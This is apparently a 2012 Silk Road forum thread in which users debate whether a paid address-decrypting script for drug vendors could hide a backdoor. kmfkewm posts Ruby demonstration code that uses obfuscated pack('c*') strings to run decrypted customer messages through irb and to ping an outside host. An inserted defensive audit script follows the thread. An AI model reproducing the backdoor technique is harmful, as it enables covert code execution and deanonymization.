So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors(although I don't think that it is that). 

Anyway, to prospective buyers of this software I would ask, is taking the security risk of using unaudited or widely viewed software from an anon on the internet and paying over $100 worth slightly streamlining 1 small part of your job?  I certainly wouldn't think so. 

I don't think that's an unreasonable thing to say either.

Anyway, kmf pretty much said the same thing I think so you can just respond to him if you want.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck2 on September 08, 2012, 06:07 pm
Also do you have any idea how the police thing I asked about should be handled kmf?  That's something that has been puzzling me about anarchy for awhile.  I guess free market based police couldn't do much worse than the current police though.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 09:15 pm
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it,

That would still be easy to spot, just look for encrypted data in the original files.

Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.

As you say, it is something that would be noticed and also easy to find.  Even if you change the "BEGIN PGP MESSAGE" and "END PGP MESSAGE" lines to obfuscate the encrypted block, you'd still have to change them back before decryption.  Whatever method you conceive of to conceal them or to rewrite them would be easily found.

Also, searching the code for any GPG command which did not invoke the user's own key and passphrase would be easy to spot.  GPG is invoked *once* in this code.  By default it is "gpg --decrypt-files *.asc" and that's it (either in a bash script or in an os.system() call).  That might be modified to force use of a particular key in order to deal with files encrypted with --hidden-recipient, --hidden-encrypt-to or --throw-keyid.  Anything else without a damn good reason and the jig is up.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 09:27 pm
Quote
No, that's just your opinion.  You want me to adhere to your definition of what Silk Road should be rather than what it actually is.

No actually I don't give a shit what you do, but I will let people know that unless you adhere to my idea of what is secure that they should not use or pay for your software.

Okay.

Quote
I've said my product is a particular thing, which runs in a certain way and is not a threat.  You (and Pine) say otherwise.  If people agree with you or are just not interested in the product then they won't buy it.  If people don't agree with you and are interested in the product then they might buy it.

I never said otherwise. I merely said the potential exists, and then explained how this potential can be greatly reduced. I am merely warning the people who may buy your product, that I would not consider it to be in their best interests to do so, as things currently stand.

Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).

Quote
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales.  If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed.  At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.

Except nobody who buys a simple python script like this is going to have the slightest clue if you are telling the truth or not.

It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.

Quote
If you really want to prove me wrong then buy SROPPy and post the code.  I'm willing to bet you don't do that.

Why would I buy something that I could make myself in about ten minutes with Ruby?

Then why don't you?  Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.

PS here is a neat link that talks about interpreted/compiled and handily discusses ruby and python. http://programmers.stackexchange.com/questions/24558/is-python-interpreted-or-compiled

Yeah, Python tends to be both.

Running an executable .py file uses the Python interpreter to run the code.  Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files).  Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.

If the Python interpreter were exploited, that could be a vector of attack.  If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall.  I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care.  There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 09:32 pm
Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.

Well, I say I'm not.  ;)  While Pine says I am.  As for what everyone else thinks, you'll need to read through the thread.

Personally I think I'm addressing enough of the issues to not need the thread locked down.  I would like the thread title changed and Pine has thus far ignored all calls for that to be done.

I think there will always be differences of opinion about whether I should give my work away for free or not, but I figure the market can decide what actually happens there.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 09:42 pm
try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code.  In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).

So let's be clear: there is NO encrypted data distributed with my code.  The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 09:54 pm
it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it ;). The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message.

...
 
The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to 

| #{[105, 114, 98].pack("c*")}

Then the issue boils down to where is the encrypted data coming from?  If there is encrypted data in my code (there isn't) then what you describe is possible.  If the only encrypted data is coming from vendor's order page then it's really not.

Not to mention the previous mention of using an air gap, which we've covered (if anyone else cares, go re-read from the start of the thread).

To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.

All it does is decrypt the files created from the CSV, decrypt them (as previously described), read the data and then rewrite that in another format to a new file.  The reading and writing of files in Python is explained here:

http://docs.python.org/tutorial/inputoutput.html
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 10:16 pm
And how does this relate to the person being accused.....

it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize  | #{[105, 114, 98].pack("c*")}  is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.

Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.

Your exploit depends on either:

a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;
or b) inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.

Now, my rebuttal:

* No encrypted data is shipped with my code.
* There is a copy of my GPG key currently.  I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).
* There is no such exploit in my code.
* Such an exploit would be able to be spotted.
* My code does not require or use a network connection in any way (vendors can make their own decisions on whether or not to utilise an air gap).
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it).  This would pretty effectively stop an exploit checking address data from being used in a live system.

So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement.  It's one thing to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.

You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 10:35 pm
I just realized I was being far too complicated with my backdoor. How about this.

It still depends on decrypting data and I've addressed that above.

On the negative side it now has an even bigger string of inexplicable numbers, on the positive side no matter what message the user gets it telnets to whatever server I would like it to go to and the message doesn't need to include ruby code at all. Hmm I bet I can think of an even more sneaky way to get IP addresses.....this is kind of fun. 

hm ping has less numbers `#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`

Oh, for God's sake, if that's all you want, then in Python it's this (replace localhost with the IP you want and maybe insert some hex code with the -p flag):

os.system("ping -c 4 127.0.0.1")

You'd want to play around with it to prevent the output printing to the screen and to make sure it worked on each OS, but otherwise that's it.  Of course spotting that is easy:

tar -xzvf sroppy.tar.gz
cd sroppy
grep ping *

Or even grep os.system * to see what all the system calls are doing.  In the current version there aren't any, but there will be a very small number in a future version.  There is not a ping command (or any other network connection) in my code.

More detail on the os module is here:

http://docs.python.org/library/os.html
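
Added example, not part of any post in this thread and not SROPPy's code: a small static audit in Ruby showing why a keyword search such as the `grep ping` check above finds nothing in the `pack("c*")` snippets quoted earlier, while decoding integer arrays and flagging shell-outs does. The sample source is constructed from those quoted snippets and is only read as text, never executed; the names `audit_source`, `decode_packed_arrays` and `keyword_hits` are hypothetical.

```ruby
# Added example: static review helper. It only reads source text; it never
# evaluates or runs the code under review.

# Constructed sample, assembled from the Ruby snippets quoted in the thread.
SAMPLE = <<'SRC'
decrypted_message = `echo "#{message}" | gpg -d`
if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
end
`#{[112, 105, 110, 103, 32, 108, 46, 116, 118].pack("c*")}`
SRC

# An integer array literal turned into a string with pack("c*"), pack("C*") or pack("U*").
INT_ARRAY_PACK =
  /\[\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\]\s*\.pack\(\s*["'][cCU]\*["']\s*\)/

# Constructs that hand a string to a shell or another process.
SHELL_OUT = {
  /`[^`]*`/                      => "backtick command",
  /%x[\{\(\[<]/                  => "%x command literal",
  /\b(?:system|exec|spawn)\s*\(/ => "system/exec/spawn call (also matches Python os.system)",
  /\bIO\.popen\b|\bOpen3\./      => "popen call"
}.freeze

Finding = Struct.new(:line_no, :kind, :detail)

# Returns the strings hidden in integer-array pack() expressions on one line.
def decode_packed_arrays(line)
  line.scan(INT_ARRAY_PACK).flatten.map do |numbers|
    bytes = numbers.split(",").map { |n| Integer(n.strip, 10) }
    # pack("C*") keeps the low 8 bits of each value, as pack("c*") does.
    bytes.pack("C*").force_encoding("UTF-8").scrub("?")
  end
end

# Line numbers on which a plain keyword appears (what a literal grep would report).
def keyword_hits(source, word)
  source.each_line.with_index(1).select { |line, _| line.include?(word) }.map { |_, no| no }
end

# Walks the source line by line and reports decoded strings and shell-outs.
def audit_source(source)
  findings = []
  source.each_line.with_index(1) do |line, no|
    decoded = decode_packed_arrays(line)
    decoded.each { |text| findings << Finding.new(no, :packed_string, text) }
    SHELL_OUT.each do |pattern, label|
      next unless line =~ pattern
      kind = decoded.empty? ? :shell_out : :shell_out_with_hidden_string
      findings << Finding.new(no, kind, label)
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  puts "literal search for 'ping': lines #{keyword_hits(SAMPLE, 'ping').inspect}"
  audit_source(SAMPLE).each do |f|
    puts format("line %d  %-30s %s", f.line_no, f.kind, f.detail.inspect)
  end
end
```

Every `shell_out` finding still needs a human to read what is piped into it; the tool narrows where to look, it does not certify a script as safe.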
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 08, 2012, 11:00 pm
Quote
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.

What a crock of shit. Agorism is extremely anti government. Agorists do not recognize the legitimacy of any government, or even of nations separated by borders. They are extremely against regulation. Even people who are anti-capitalist generally accuse capitalists of being anti-regulation, claiming that government regulations protect the people from the evil capitalists who only care about money and not the well being of the people, so I don't see where you get capitalism is pro regulation from. The USA is not a capitalist country, if that is where you happen to live. The USA merely claims to be a capitalist country. It is really quite a fascist country, although currently the democrat politicians masquerade as socialist to get support from the public which is largely in favor of socialism. Agorism is about as anti-regulation anti-government anti-fascist as you can get, although it is perfectly fine with market manipulation and monopolies and such.

Note that I stated I WAS a staunch capitalist for many years, not that I remain one. I think perhaps you may have misread what I wrote above?  ??? I stated that with capitalism comes regulation and government intrusion, and that capitalism by way of its regulatory nature is what powers the governments of today and their restrictive laws.
As far as the US is concerned, no I don't live there but I would agree that it is becoming terribly fascist. I think it would best be described as having a dirigiste economy.

Quote
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.

No most of those drugs are restricted, maybe that is what you meant to say? And it is because of fascism not capitalism. Silk road is a great example of Agorism. The primary theory of Agorism is that private security agencies will rise up, funded by black market activity (such as drug trafficking), and will eventually become powerful enough to totally protect their customers from the state, eventually leading to the death of the state and government. That is Agorism in a nutshell, not banning drugs and regulating things lol.

Yup, that was a typo. I meant to say "Capitalism is the reason that marijuana and most other drugs ARE restricted." I don't understand your tirade against pretty much everything I said; we agree on virtually all the points above. I did not mention once that agorism was about banning drugs and regulating things - in fact I stated the opposite, apart from the sentence containing that one typo.  ???

Quote
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.

Most Agorists are very pro-gold and against fiat currency, although bitcoin is of course insanely popular with them as well.

Gold is not money, and as I stated, I value my freedom more than I value money. I believe you misunderstood most of what I said in my last quote.  ???

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 11:02 pm
Quote
As such, Louis has the right to market his wares under any conditions that he deems fit.

Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.

Not true.  Pine tried exactly that before starting this thread.  See this post from her details earlier in this thread:

http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841

Quote
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.

If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?

Ah, but this isn't really a review of the product, it's your assertions about it with no evidence.  You already know how to get the evidence to prove one of us right, you're choosing not to.

Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.

Quote
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.

It is wrong to say that his product IS backdoored. It is wrong to say a vendor's product has been cut with Drano if you have not purchased some and tested it. It is not wrong to say that PMA is dangerous if a vendor is selling PMA.

Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done.  You have not actually obtained the code and proven that it does contain such an exploit.

I have written the code and stated there is no such exploit.  You have yet to prove that I am lying.

Another major vendor is running the code and has stated that it does exactly what I said it did.  You and Pine have been unable to prove that false.

Quote
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?

Because his product could lead to vendors being busted and then customers being busted? But he has no obligation to be responsible with his programs, just as we have no responsibility to say we think his behaviors are anything other than sketchy.

Only if it does what you say it does instead of what I say it does.

Once again, you know how to prove your claim.

Quote
I don't trust Louis' software -- I wouldn't touch it with a barge-pole. I also wouldn't trust software written by Pine, kmfkewm, Shannon or even DPR themselves for that matter, unless I had thoroughly vetted it first.

You should learn C because I am going to release some nice stuff soon :). Also have it in Ruby nearly done but that is just for prototyping.

Guru knows C.  Guru's pseudonym is well chosen.

Quote
Louis is absolutely right -- he has the right to sell his software, and people have the right to buy it -- or not -- as they see fit.

Sure enough and we have the right to leave reviews saying that we find it sketchy and warning the poor souls who might otherwise think it is safe to privately obtain scripts from people on SR to help aide them in their drug trafficking careers.

Once again, these aren't reviews of the product and your claim that they are is disingenuous at best.  Your assertions are a series of hypothetical explanations of how an exploit could be inserted, but not a review of the actual code I am selling.

There has been one review of the code in this thread, which you have chosen to ignore.

That review is here (on the first page):

http://dkn255hz262ypmii.onion/index.php?topic=40934.msg450715#msg450715
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 08, 2012, 11:35 pm
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.

The difference is as follows:

1.  It's impossible for a drug seller to really prove that they'll always be shipping something safe.  It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.

Two problems here:

1)  A programmer could release code that is safe and sell something else.
2)  Releasing the code freely cuts out payment for the work put in, as I've explained previously.

2.  If a drug dealer ships something unsafe then 1 person has a bad reaction.  If louis widely gives out malware specifically targeting vendors and information regarding their vending then that's a major blow to silk road itself.

That's a big if.  Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum.  Until someone does then this is all conjecture and baseless assertions.

3.  It's usually possible for a user of drugs to get a reagent test and test their drugs.  It's not possible for a prospective user of software to suddenly learn programming and test a program.

It is, however, possible for them to receive an explanation of that code and/or run the code on a disconnected machine.

So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors(although I don't think that it is that). 

For the record, I don't have any problem with questions about what the code does.

What I have a problem with is the baseless and false accusations of nefarious activity on my part with nothing to back it up.  You've seen that I've copped that from both Pine and Kmf.

Anyway, to prospective buyers of this software I would ask, is taking the security risk of using unaudited or widely viewed software from an anon on the internet and paying over $100 worth slightly streamlining 1 small part of your job?  I certainly wouldn't think so. 

It depends on the number of orders, their time constraints and the like.  This code when run can go from grabbing orders off the order page to printing labels in well under an hour (a few minutes plus printing time if the addresses are all in the correct format).  Some vendors have already stated it takes them much longer to perform this processing task.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 04:00 am
Indeed, I know a vendor who spends half a day decrypting addresses.
Sroppy does it in milliseconds.
Vendor doesn't have to do crazy gangsigns on his laptop keyboard anymore cutting and pasting blocks of pgp gibberish

Awesome!  :)

It's great hearing news like that.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck2 on September 09, 2012, 04:26 am
I didn't know it took that long, I guess it's a bit more useful than I thought due to that.

Well, this'll be my last post, in the end I don't know enough about programming to really judge to a certainty whether your program could hypothetically be a security risk, however, a lot of the people who DO know about these things better than I do say that it would be including guru saying he wouldn't touch it with a barge pole etc. etc.

So what are we arguing about?  I don't really know at this point because everyone seems to agree about almost everything, I wish sick girl or someone who thought this was ridiculous or that it couldn't be a security risk would pipe in again. 

So if all of those people think a program is unsafe unless certain steps are taken and that is the main concern people have here then what is your really simple summarized response to that?  Do you think that it could potentially represent a security risk to buy anonymous unaudited software from you or not?  Everyone here seems to think so and that's really the only major point that anyone has brought up but ironically it seems like that is the one point you haven't been clear enough on.

I think you've only really answered by saying you'd somehow give them a completely in depth explanation of absolutely everything regarding the code but unless you made it many many pages and sourced absolutely with internet links etc then they'd just be blindly putting faith in the fact that you're not lying no?  It just doesn't seem possible and would probably be MUCH more work than everything else combined.  Did you give the vendors who have bought it so far any of that?

I guess you've also said that it would be easier to get to vendors in other ways but that doesn't really say anything whether it's true or not.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 05:23 am
try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code.  In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).

So let's be clear: there is NO encrypted data distributed with my code.  The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).

There is nothing encrypted in my example either, the only encrypted data would be ciphertexts encrypted by anyone to the vendors key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.

Quote

#opens the file with your GPG ciphertext in it. Right now you need to have a file that holds them, however the ciphertext can come from anywhere.
file = File.open("test", "r")

#creates a string variable named message
message = ""

#reads the ciphertext file line by line and adds each line to the string variable message, loading the ciphertext into memory
while line = file.gets
message << line
end


#decrypts the message and references the plaintext with the variable decrypted_message
#the ciphertext is decrypted by taking the ciphertext in memory and sending it to the command line
#which then echos it and pipes it to gpg with the -d command. You will be prompted by GPG for
#your passphrase.

decrypted_message = `echo "#{message}" | gpg -d`


#if the decrypted message has the string gpg-privacy-toolkit anywhere in it then the decrypted message is
#piped to the command line where it is echoed and then piped to the ruby interpreter which is called with
#the word irb which is represented as an array of numbers to try and obfuscate what is going on. The pipe (|)
# can also be encoded in this way. Once the decrypted message is piped to irb it is treated as a ruby script,
# so if there is networking code in the decrypted message then networking can take place even though there
# is no networking code in this program, the decrypted message is treated as an entirely new script.
if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`

#if the decrypted message doesn't have the signal gpg-privacy-toolkit in it, then merely put the output
#of echoing the decrypted message, which is a bit convoluted since we could just puts the decrypted
#message directly, but it makes the special case seem less sketchy to do it this way.
else
 puts `echo "#{decrypted_message}"`
end

#it could be made to look even less sketchy by piping every message to irb and echoing the output of it
#and making it a string to puts if it doesn't contain the special signal string or otherwise treating it as a
#script, then messages will be printed to the terminal unless they have the special signal string
#but there will be no need for an if else statement.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 05:28 am
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it,

That would still be easy to spot, just look for encrypted data in the original files.

Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.

As you say, it is something that would be noticed and also easy to find.  Even if you change the "BEGIN PGP MESSAGE" and "END PGP MESSAGE" lines to obfuscate the encrypted block, you'd still have to change them back before decryption.  Whatever method you conceive of to conceal them or to rewrite them would be easily found.

Also, searching the code for any GPG command which did not invoke the user's own key and passphrase would be easy to spot.  GPG is invoked *once* in this code.  By default it is "gpg --decrypt-files *.asc" and that's it (either in a bash script or in an os.system() call).  That might be modified to force use of a particular key in order to deal with files encrypted with --hidden-recipient, --hidden-encrypt-to or --throw-keyid.  Anything else without a damn good reason and the jig is up.

You are completely misunderstanding what I did. I didn't include encrypted code with the program, I included a line of code in the program that executes a decrypted ciphertext as another script if it has a special signal string in it. The only difference between a completely legitimate version of my simple script (that merely takes a file with a GPG ciphertext in it and prints the plaintext to the screen after the user has entered their password) and a malicious version that allows an attacker to craft a ciphertext that decrypts into additional code that is executed, is this line of code in the original program: | #{[105, 114, 98].pack("c*")

And you can claim all you want here about how your code functions, but nobody will ever know unless they look at it and the full point we are trying to make is that the people who are going to buy it inherently are people who will not notice that | #{[105, 114, 98].pack("c*") is the difference between a safe program and a backdoored version.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 05:37 am
Quote
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).

I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???

Quote
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.

You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*") sets the formatting of the text, I don't expect them to analyze every single line of what I write simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here, then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??

Quote
Then why don't you?  Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.

Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.


Quote
Running an executable .py file uses the Python interpreter to run the code.  Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files).  Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.

Ruby is same written in C with much of the modules also C. The primary difference seems to be that python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in ruby 2.0 :D.

Quote
If the Python interpreter were exploited, that could be a vector of attack.  If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall.  I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care.  There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.

I am not at all worried that the primary  python interpreters are going to be exploited anymore than I am that firefox is. What I am worried about is the fact that someone buying a script like this is not going to recognize | #{[105, 114, 98].pack("c*") is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack as well as ways of encoding data as well as what the pipe symbol does on the terminal as well as what back ticks do in ruby. The actual program distributed would have no networking code, would make a single call to GPG using the users own key, and could even be made more sneaky by removing the need for an if else statement.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 05:43 am
Quote
Then the issue boils down to where is the encrypted data coming from?  If there is encrypted data in my code (there isn't) then what you describe is possible.  If the only encrypted data is coming from vendor's order page then it's really not.

Doesn't the encrypted data on the vendors page come from customers? The encrypted data is coming from a customer who encrypts ruby code instead of their address. In fact they can even encrypt ruby code that puts their address after it is done with all of its networking.

Quote
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.

No it doesn't need to generate the code. Currently what I showed does check for a specific string and if it finds it it pipes the decrypted message to a ruby interpreter, which then runs it as a completely different script automatically. There are probably even more sneaky ways to do it without looking for a special string.

Quote
All it does is decrypt the files created from the CSV, decrypt them (as previously described), read the data and then rewrite that in another format to a new file.  The reading and writing of files in Python is explained here:

http://docs.python.org/tutorial/inputoutput.html

We can not possibly know what it does without looking at it, that is the entire point of this thread. But honestly if you want to let the market decide I really don't give a shit. I think that you are thinking more with your wallet than logically though.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 06:04 am
Quote
Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.

First I would need to learn Python but I am not going to bother to because I already showed it in Ruby, and the two languages are very similar. Object oriented (usually) interpreted scripting languages.


Quote
a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;

Yes it would need to be run on a system with network access, no it does not need to ship the code with encrypted data it gets the malicious code after a vendor decrypts it with their own key.

Quote
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.

It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python. having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.

Quote
* No encrypted data is shipped with my code.

But it gets encrypted data input from random customers

Quote
* There is a copy of my GPG key currently.  I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).


There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.

Quote
* There is no such exploit in my code.

Possibly not. Probably not even! But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where people's claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.

Quote
* Such an exploit would be able to be spotted.

Indeed by anyone who knows the language well enough to

A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing

Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.

Quote
* My code does not require or use a network connection in any way (vendors can make their own decisions on whether or not to utilise an air gap).

Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.

Quote
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it).  This would pretty effectively stop an exploit checking address data from being used in a live system.

You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.

Quote
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement.  It's one thing to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.

I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.


Quote
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

